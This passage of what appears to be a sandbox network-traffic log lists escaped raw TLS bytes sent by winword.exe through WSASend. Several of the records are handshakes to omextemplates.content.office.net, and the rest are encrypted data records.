424. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x86\\xe7\\xd6\\xe0\\xf1\\x07\\x908a\\xeac\\x0c\\xedoqt\\xf3\\x02y\\xe93\\x81\\xc8\n\\xd6\\x7fx\\xb2\\x0bd\\xd1a\\x82\\xaa0\\x14\\xf5\\xec\t\\xf9\\x99\\x88z\\xc8\\xcb\\xa01\\x07)\\x1c2\\xa8\\xa3a\\x9fgcjsqii\\x91\\xd8\\xffq\\x99k\\xcf\\x82\\x07\\xcf\\x13\\x04\\xcb\\xdbu\\x06z\\xae<g\\x88\\x8c\\x1fkzn\\x1f\\xa1\\xf0\\x8fu\\xfcqo\\x95,\\x1cg\t\\xc4\n\\xea8\\xdf\\xb7\\x87\\xa0\\xd5\\xf1_\\x9fw+dz\\xe3\\xbb\\xf4qjp\\xbb\\x0f\\x10o@\\xb2\\xe1\\xcc\\x1d\\xe74g\\xbb\\xacdd%%^\\x01\\xa4\\x1a\\xa8\\xaa>\\xe0\\x1e\\x8f\\x92\\x9es\\xba\\x86`\\x80\\xa9\\x10\\xean\\x87\\x08\\x933s\\xb3\\x80\\x06u\\xb2\\x03\\xd7zy\\x85\\x1dkmta\\x89\\x19\\xbck\\x04\\xdd\\x14\\xce\\xe6\\x05\\x04\\xd1\\x82\\xa3\\x98f\\x89h\\xf0q7\\xaa\\xb9\\xf7\\x8b\\xe1^\\x80r\\xe8<*\\x800\\x10\\xef6\\\\xc8x9\\xd2\\x9b*j\\xeaj\\xd6\\xdea0\\x9e\\x0c|\\xa4b\\x94v,\\x0b\\xe8\\xd5\\xe8\\xb4\\xaf\\x8d"
425.  
426.  
427. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x90b\\x83j\\xe8\\xb967\\x0e\\xe9\\x9e\\xa9\\xfeq'\\xc0$\\xf2\\xe8g\\x01\\x80\\x8a\\xb6\\xf7_\\xc3:(zy\\x19\\x9e\\xf3\\xe9\\x03\\xc9s\\xa1\\x11\\x92<\\xe4\\xf7\\xf5\\xa5\\xf6\\xa9o5e\\x81\\xa0\\xd4\\x1c\\x836=\\xa5\\xb1u\\x9cx.rr\\xaa2\\xf5 \\xc1\\xc4\\xa9i\\x01=\\x95\\x8e\\x1dc\\xbd\\xd4\\xecw\\x9d_xj\\x83xh\\xf1\\xfb\\x94\\xda\\x1f<|\\xa8\\x164\\x15\\xb9\\xa7\\xce\\x98\\xf8k\\x19\\xfe\\xb6\\xacbk\\xca\\x99fh\\xe6\\xd9'\\xf0\\x88\r\\xd4\\xe3\\x17\\xa2\\xd6q\\xde\\xc9h\\xf6\\x94\\x14\\xdet*p\\x1ane,.\\xc2\\xf6/c\\xe4g\\xfcbb\\x84\\x7f\\xec\\xa5v\\rz\\xc7\\xdd\\x1b~o\\x9d\\xb77\\x8f\\xc2\\x84n\\xb7\\xb5!8\\xb5h\\x8a\\x1d\\x84\\\\x00>\\x02\\x05\\xab\\x16=w\\xc6\\xc0^v\\x10d\\xde\\x8b\\xf4\n\\xa1\\$\\xa4o@bf\\xd3d*\\xe6\\xc1'ye\\x82\\xf3\\xd4;ej\\xa8\\x13\\xd4\\x17ze\\xb8\\xd9\\xd1e$x\\x12o\\xb1\\xf4\\xe3\\xc4\\x87\\x8a\\xcd"
428.  
429.  
430. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x0f0\\x01\\xbd\\xc7\\xa1y\\xdf\\x1c\\x15\\xd6\\xc4&\\xe0\\x18\\x1fk\\xed\\xd1`'w\\x94\\xc3\\xd7\\xa2 \\x1e\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
431.  
432.  
433. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flf\\x0e\\x0c\\x9e\\xdb\\x80\\xde#ea\\xe2k@\\xf2h:\\xdb\\x0ep\\x89f\\xc9\\x8f\\xc15\\x97g\\x86\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
434.  
435.  
436. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9et\\x1b\\x8a\\xe3\\xae\\x1dq\\xda$\\xffi\\x0c0\\xf2e\\xb8\\x14\\x0f\\x9f\\x00\\xfc>\\x94\\xb9\\xf6\\xed\\xb0\\x80ow\\xc953v\\xf1-:\\xa2\\xc0\\xa9j\\xabcx\\x85g_\\xfd8a\\x94h\\x0e\\xd31\\xcc\\xc9+\\xd1\\xf2\\xeb\\xbdp\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0008\\xa2\\xf1ga\\x85\\xae\\x8fpa\\xbd\\xea\\xdaw\\x88h\\xd5\\x00t\\xd3\\x99\\xe1\\xa4\\x1c\\xb2z\\xdfp\\x9e\\xb6\\xd4:\\x9d,\\xb8\"d@;\\xf1\\xbb\\xe4\\xeez\\x166\\x03\r"
437.  
438.  
439. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x86\\x93\\xd7\\x00%\\x06\\xdb\\x1c\\xc0\\xff\\xd3\\x81\\x95#\\xc0\\xeb\\x96f\\xeb\\xc7\\xee\\xbb\\x85\\xde'\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
440.  
441.  
442. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flb\\xb5\\xad~)\\xd2rj\\xd3\\xec\\xc1\\xdc\\xf8,\\xfe\\x01\\xed&\\xba.\\xf9m\\xe9\\xc4a\\xbd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
443.  
444.  
445. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flu\\xa6?\\x0f\\xf6:c\\x17r\\x1ba\\x83,^()\\xe2\\xcf\\x89\\xa5\\xc1\\x18\\xed>q\\x13\\x8d~\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
446.  
447.  
448. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x1c\\x00\\xbe\\x1c\r*\\x99\\xe3\\xdf\\xbe/\\xd9\\xb4v\\xcb\\x9f\\xa2v\\xe7\\xab\\x1a\\xf8\\x04\\xc7\\x8f/!\\xc8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
449.  
450.  
451. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\xd9x\\xe6__v^k\\x9b\\xfa\\x18u\\x93\\xc2\\xb2b\\xad\\x14\\xfa=v\\xeb\\x89a\\x08\\xf8\\x98\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
452.  
453.  
454. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x16c\\x8f\\xfc8\\x83\\xc9\\xa5i\\xad\\x18\\xeaa\\x7f\\xdb:\\x88ab\\x10-\\x08s\\xe9\\x07\\xae@\\xe1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
455.  
456.  
457. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl^\\x91i\\x8f\\x19\\xbbt\\x1b\\xd3q\\x81\\x9e\\xbf5p\\x89\\xca!1&q\\xb7k\\xb2e\\x97 \\x8b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
458.  
459.  
460. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\n\\xdb\\xea\\x97\\x88\\x00\\xf9\\x00\\x1c>\n4\\xd9\\x95ei\\x17\\x84\\xb7\\xeb\\x10e\\xd4\\xe8\\x87\\xef\\xe3,\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
461.  
462.  
463. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf8\\xee:\\xafnu\\xfd\\xf2\\xae\\xaa\\x08\\xd87\\x85\\x87\\xff\\x13n\\xce\\x17\\xe9\\xd7p \\x19\\x9c\\x96\\x97k\\xebt\\xef\\x06@\\xcac\\xcd5\\xb8\\xcc\\xe9\\x8d\\xb8.\\xef\\xd67\\xb1\\x06ihy!s\\xf0\\xbd\\xf273\\x1a\\xec\\x1f\\xb4\\xf3\\xd4?<\\xfa\\xfa\\xa4p\\xe9\\xa6\\x15\\x08\\xea#cj\\x14\\x98\\x13\\x9d4\\x03\\xd9\\xb4\\xaet\\xd7\\x9e\\x82)\\x1ei%\\x9c^\\xc4\\x93\\x8b\\x1c\\xcc\\x81\\x19\\xd7\\xe2dr'\\x9c+\\xdc\\xad\\xe1\\x88\\xa5\\x9bz\\x89\\x02\\x88\\x9a\\xf2\\x9cn\\x9c\\x87cj\\xc6\\xa3(\\xd1\\xd2\\x87\\x15\\x8a\\xb0\\xc3\\xa5f\\xb6gu\\x006\\xc8\\x15\\xe2\\xed\\x89\\x9a\\x8cm\\x82\\xa6\\x93\\xf7us\\x06\\x91h\\xea\\xc9b\\x8elp\rl\\xa9\\xbc\\x0cu\\xc1_\\xdej\\x16\\xd9\\xcb\\xf6\\xa1\\xe44\\x8e<u\\x1f\\xf5\\xe7c\\xf2d\\x94\\x15,\\xde\\xea \\xdcz\\xe5\\xe5^x9\\xc0\\xde\\xe0\\x9e\\xd0\\xa8\\xa3\\xecow\\x17\\xb3)\\x02\\x91\\x92\\xc3q\\x11#nf+z\\x9b\\x87z0:`\\xb7\\xb7!\\xf4\\xe7\\xc8|\\x13\\\\"
464.  
465.  
466. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04s\\x96\\x13\\xb8\\xcez\\xcdub\\xce\\x92\\x82\\xe5z\\xdc\\xe3\\xf4t\\xba~\\xd6\\xcf\\xb05\\xe5^\\xa1\\x02\\xea\\xaam\\x86\\xb9\\x8e\\xc2*\\xb7\n\\x0fp\\x05\\xa7;\\xc4\\xd4ve\\x8a\\x1b\\x91\\x82\\xf6:x\\xb3\\x1ef'\\x08\\xd0\\xb3\\xf45\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000,p\\x99\\xfb\\xfd\\xcb\\x9aw\\xab\\x8e\\x0f\\x90\\xf7\\xa8\\xaf\\x9f\\\\x9a\\xa1\\xa1 \\xd0\\xe4\n>\\x96\\xe9z\\x1f\\xa4.\\xed8z\\xdc\\xac\\xb4\\xd8\\xb6\\x8f\\xe4z\\x06\\xfa\\x0c\\xec\\xa5m"
467.  
468.  
469. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04m\\x8e\\xa6\t\\x0b\\xa8#t\\xb1\\x93(b!\\xb1c\\xa5\\xa6\\x9e\\x12~\\x80\\xe3\\xde\\xdak+\\xe8al\\xd2@\\xe0\\xc8\\xd3\\x1b\\xaa\\xe7w\\xee71m\\xa8\\xb6\\xf6\\x9c\\xab\\xc47sk m\\xdf\\x89g_\\x1b\\x0b\\x84\\xe6n\\x13\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000u=p\\xf8a\\xc0n\\x19\\xf0s\\xcd4mq\\xecw\\xb7\\x9e\\x9f\\xbfx\\xa0z\\x99p\\xb1q\\x8f\\xff\\xa8\\xaa\\xd0e\\xd41\n\\x85\\x0e\\xb9rmt\r\\xb3\\x80\\x99\\xf2"
470.  
471.  
472. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x07\\x7f\\xd6v\\x17i\\x9a\\x81f\\xb2\\xc0o>\\x1a\\xe88\\x11t3\\xa6\"\\xc7\\xdfxq\\xcex\\xc1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
473.  
474.  
475. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd0\\xf0u@\\xeb\\xa5d\\xc5z\\xfb\"6\\xd44\\x8f\\x8ag?\\xa9\\x08\\xe7\\x00@\\xf0\\x14\\x9c\\xf9\\xc7\\xaf9\\xe4l\\x19\\x17\\x08\\xdf\\x8a\\x95\\x89\\x85\\x15\n\\x1au\\x9eh\\xf1\\xd4,$\\xee\\xa8\\xd0\\x10\\xa4\\x800 o\\xd2\\xa8\"j\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1b\\xc93\\xf1\\xa1f\\xc0\\xff\\x92\\xf4\\xd6\\xa8\\x05\\xe4\\x89\\x8e\\xa9'\\x1f*i\\xa5\\x98^\\x88>-\\xf3i\\xd9\\xec\\xf7\\x91\\xe3\\x99\\xd8\\x0bz\\xea\\xcf\\x11c\\xefa\\xd5+\\xc4\\xeb"
476.  
477.  
478. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x80\\xe27\\xee\\x9f:\\x8d9<\\xc7\\xf7,,r\\xb3u\\xb6\\x03\\xcfs\\xcb\\xcc\\x16j\\xaczj`\\xdcy\\xc0\\x1e\\xc6\\x9e\\x9e\\x13<hc\\x82\\xd8y\t\\xae;\\xd4\\xa9\\x80-zf\\xa6\\x151\\x9a\\xa6\\xecl\\xcd\\xc4\\xf90\\xc2\\x16\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x91w\\x95\\x8d\\x8d\\x06\\xc9\\x9a\\x08\\x8d1\\x00\\xd7=\\xba\\x8b\\x9eo\\xa9\\xda\\xed\\xb7\\x12\\x0eom\\xb4&\\xcc\\x812\\x95\\x13\\xe22\\x1d\\xb1\\x9d\\xd8\\xb2\\xddf\\xc3\\xa9\\x04\\x8f\\x9a"
479.  
480.  
481. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x0f\\xd3?-\\xe5\\xc3\\x15|\"\\xb70\\xdd\\xdcses\\x1fn\\xc1 \\x83\\xd0\\xf3\\xe2y\\x91\\xb5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
482.  
483.  
484. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x041\\x8a\\xbfn\\x9d2\r\\xae\\xa2;\\x00\\z\\x8al\\x1b\\\\x11;q\\xe9\\xf6|\\xfe\\xaeg\\x0e\\x06\\xa7\\x89\\x17\\xa7\\xe7!*\\xd0\\x0f\\xb8\\x16\\xb2\\x94zi\\xc3/\\x06\\xda*?\\x92\\x16\\xfb\\x04\\xcc\\x86r\\x9f\\x140\\x89\\xb4\\x02w\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xdd\\xb6\\xa9uov*bk\\x1e\\xb5\\xe1\\xb61`n\\x16\\xae\\x19\\xe5k6\\xba\\x90\\x1a\\x01\\xb4z\\xf3\\xaai\\xaf2\\xde\\xd3vq\\xe8?\\xb6\\xb6\\x01\\x1f\\x02\\x1dr"
485.  
486.  
487. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa8\\xdbz\\x03\\xda\\xa5\\x9e\\xc5\\xe8$=w\\xa2\\xa22\\xea\\xab\\xfe\\xb4\\xcf\\xec\\xe9\\xbb\\xcco\\xc6xz\\x19\\x9a\\x1b%\\xebgr4\\x87\\xdd\\xdf\\xdb\\xa6\\xd8\\xb2\\x89a\\xcc\\x8d\\x965\\x9a\\xce=?$\\x07a\\xbcji\\x88\\x0e@\t!\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x8a\\xd5\\x15:\\xa9\\x95j\\xc5\\x87\\xaa\\xdc\\x8e\\xffo\\x13\\xb6c\\x8c\\xb4\\x8e\\x81z\\xe4\\xb1\\xca\\xa8z\\xa8\\xd6+\\xa9;\\x87\\xd6\\x99\\x07\\x1dt\\x1e\\xe1\r\\xff\\xcd\\xf5\\x005\\xce"
488.  
489.  
490. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf9\\xa7\\xa2s.\\xb8g>\\x01\\xe5\\x90g\\xae\\xdc@\\xfa\\xc3\\xbe\\x11\\x06\\xb0~\\x97uc\\xef\\x85kv\\xdf\\xdbh\\x0f\\xcb*v\\xe0\\xc92u\\x90|\\xb5\\x93\\xb8\\xbc>\\4\\xb5\\x80g\t\\xf5l\\x1b\\xd9\\xaa\\x19\\xec\\xc8\\xad\\xa29\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000k\\xe6\\xc2\\x80\\x87\\xfe<\\xd1\\xa61\\x88\\x08~\\xa8\\xa9\\x13@;`-l&\\xf4\\x82\\xc5\\xd5\\x12\\x19ea\\xf3\\x8d\\x0e\\x95\\x11\\xfe\\xcbms\\xe9'\\xce~u\\x00\\x1c"
491.  
492.  
493. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04u`\\x95\\x12zm\\xacj\\x0e\\xecnx\\xbf\\x8er\\xa3\\x84\\xa4\"\\xbe\\xb9\\x16t\\x0c9\\xda\\x803\\x0bm\\xa7\\x9d\\x85\\xd1\\x86\\xf1\\xac\\xc2\\x82\\xad\\x0f\\xb2\\xe6\t=\\xafjay\\xaa\\xa5=\\xb2\\x8eq\\xab\\xa8\\xf5\\xc4\\xa2k\\xb0\\xc4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0003\\x1a_\\x1focbwd\\xe6l,\"\\x89\\x0c\\x01\t\\x15\\x1b\\xc8\\xc4\\xf0!\\x16\\x9b\\x8b;\\xc3\\xae\\xc04\\x13`hy\\xf5n\\x1cn7\\xd7\\xa6\\x06\\x96\\xfd\\xf3^\\xd1"
494.  
495.  
496. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x14\\x00\\x94\\x82md\\xf2d\\xa2>_\\xbf\"%\\xff\\xba\\x03'v4'\\x12g\\xd8yk\\x17\\x1c\\x1anu\\x91\\xa28\\x08y\\xc3xri\\x1e\\x8cm\"\\xe4\\xd1\\xcc\\x8by8\\xf9e\\xb9\\x98\\x91\\x9fs\\x9e\\x15\\xb11\\xdbb\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x08vlemg\\xee\\x94v\\xe2~\\x17\\xc5\\x19\\xcc|\\xd3\\xd7\\xe0\\x88\\x1f\\x07k\\xe6r\\x99\\xba\\xd1m\\x1b\\xc8\\xf4\\xedq\\xa0\\xa8\\x13\\x1c5\t\\xda,\\xdd\\xf1\\xd7\\xc3\\xdb\\xfb"
497.  
498.  
499. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x04\\xd1\\xb9>j\\xf5t\\xab^\\x8b\\xd5\\x87\\xa9\\x12\\xa1;_\\x9f\\x02t\\xbc\\x87u\\xb1\\xcd0~\\xdf\\xbb^p\\xcduq\\x9bp?\\xdfp\\x88\\xef\\xf3n\\xd3\\x15k\\xd8\\xd9u\\x05\\xca\\xab\\x9945v\\xcd\\xe4/r\\xf5\\xcd-,\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb6fy\\x9asp/\\xe4\\x01\\xd0\\x18l@\\xeb\\xad\\x92\\xf3\\xf1\\\\xdc\\x1da73\\x04=\\x1cd\\x93 h2\\xbc\\xbd\\xdf\\xa9\\xa1 \\xfa?y\\x9b\\x10\r0\\xc0\\x1e"
500.  
501.  
502. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x96\\x11\\xa2\\x98\\x89\\k\\xbfc\\x17\\x93p\"\\x90b\\x0b*\\x16\\x174\\xba\\xe3\\x9d9\\xb1\\xbc*3\\xcb\\xec\\xbd\\xd4\\x14\\xaf\\xde\\x94!ye\\x05\\x11\\xf4\\x1a\\x1b\\x08\\xef63\\xf0k\\xc1\\xc92\\xd4l2k\\x00f\\x93z\\xaaa,\\xcfq\\x19\\x17\\xd8\\xd4f\\xa5\r\\x96\\x0c=\\xfdo\\xf4\\xca\r\\xf4\\xd6y\\xa8\\xed\\xb6v\\xef\\xaa.6\\xe2\\xd9k\\x03\\xdc\\xd0\\xa3t\\x07o4\\x9a\\xea\\x0fm\\x89\\xc9<\\xcb|\\xf7\\xa1o\\xcez\\x7fg\\xeao\\xc9\\xfaj\\x10+\\xc46\\x05x_\\xf1\\xccm\\x19\\x860\\xb9\\xe2\\x89m\n\\x19\\x94w\\xdb\\xda:hn\\xc4\\x10\\x90y\\x98\\x07\\x86\\x7f\\x10g\\x9e\\xc2q\\xf6\\x1d\\xa2\\xa0\\x0b\\x93\\xb8pp\\x8e\\xa8\\xd3\\xea\\x15\\x0e\\xd0\\xd2\\xdcv\\x01\\x10ie\\x9b\\xa2\\x95#z\\xb8\\x0b\\xc7uj\\x9d\\x11\\xac\\xdf\\xbc3'\\xef\\xf0\\xbf\\x07\tulp\\xce\\xa6\\xf6\\xc9d\\x9b\\xa5\\x198\\x0b\\x9b\\x89\n\\xff\\x1ej\\x96|\\xb2\\xdf\\xaa\\x1c\\x87=/\\xbf\\x99obr\\x8ep\\xc6\\xf5\\xaf\\x91"
503.  
504.  
505. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb5\\xe0e\\xb8\\xc9\\x9dn\\x8c\\x91c\\xb2\\x15\\xd59\\xaf\\x15\\xef\\x19bd\\x11\\xd0\\x844\\xb4\\x8e\\x7f=\\x17,\\xdd^!\\xac4\\x9d'u\\xed\\xff\\xd4\\xd1\\xe7\\xe5o\\xc7\\x97l\\xb7\\xf8g\\xed\\x05\\x9b\\xba3\\xc2\\x0f\\xd4+\\x82\\xbc\\xd1\\xf3\\x04\\xdd<\\x92\\xb0\\xcby/\\xd3\\x8c\\xab\\x15\\xca\\xbc6l\\xa7\\x01o\\x06\\xecj\\xa9-z\\x8e\\xf8\\x88s\\x9a\\xdc7a\\xd5\\xed,\\xdab\\x8c`z\\x07\\xc9\\xaf\\x04\\xbdu\\x11\\xd4<\\x18\\xd7\\x0f\r\t\\xc4'n\\x01\\xfd\\x9a\\x01\\xb4\\xa4\\xd5\\x9em\\xeb\\xc8\\xcc\\xff\\xc5\\xd7\\x11xr\\xba\\x0cl\\xa9\\xfc8\\xac\\xc6fjw\\x0b\\xbcr,_\\x03\\x1a\\xccm:/\\xce\\x14\\xf2\tpy/8\"\\xc2\\xac\\x9ek\\xect\\xe6\\xe5\\xeb\\xcc\\x93\\x7f\\xbd\\x1bch\\x05\\xce\\x13\\xe3ple\\x910\\xdd\\x18n^\\xd6u\\xef\\x8e\\x8b\\x93z\\x139\\xb5dq\\xd6\\xe8~t\\xcdz\\xfb\\x82c\\xe1\\xcb\\xe8\\x1ai\\xdc|%\\xad:g\\xcbr\\x94\\ \\xbem\\xf3+\\x99\\x98\\xde\\x91j\\xee\\xa3"
506.  
507.  
508. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa1t\n\\xc1+\\x04\\x1b\\x00\\x08\\xf2\\xaf\\x0brf<b\\xcd\\x8c\\x87\\x98\\x0e\\x9b\\xe9\\x7f\\xfc\\x96\t\\xf6\\x8a\\xa4\\xdd\\xc6-\\x96\\xc1\\xc3\\xdc\\x06m\\xf0\\xfb\\x11\\xae`\\x8b\\x82\\xa8\\xd6\\x13\\xd1\\xe2\\x85+#\\x1b\\xf0\\x80*8\\x1f\\x15fsi\\x9b+\\xce\\xf2 \\x03\\xef\\xd5\\xcb)\\xfe;=\\xe1\\x9d\\x87\\x03\\xab\\xff\\x8f\t\\x9b\\xf4\\x8d\\xd22z\\x10\\x85\\xaa\\xc0c;\\xc2>\\x95\\x1d\\xa3=\\xc2%\\x12/\\x91\\xb5\\x90\\x83\\xc1\\xe5\\xd3\\x9f\\x91h\\x03\\xa5\\x9a\\xfbz7\\x1c\\xf0w\\xc8\\x9d\\xd3rc\\xd7\\x0e\\xda\\xe6\\xb7\\xaa\\xabc\\xb0\\x19\\xb5\\x03\\x06\\xd43\\x94\\x13i>u\\xc8ocu\\xbb\\x1c\\x87l^s\\xc1\\xe1t5(m\\x85\\xf3\\xccu+x\\x1c8\\x85@p\\xa9\\x08\\xe0\\xab\\xeb\\xfbd#\\xaes\\x82h^\\xdf\\xafv\\x87\\xc8\\xef\\xdfxy\\x11\\xfa\\xf0\\x8e\\xe38-\\xed\\x8ejn\\x99nd:\\xf1\\xbe\\xf2\\x8c\\x07\\xf9uc\\xde\\xefg\\xdd$\\x86h'\\xd5 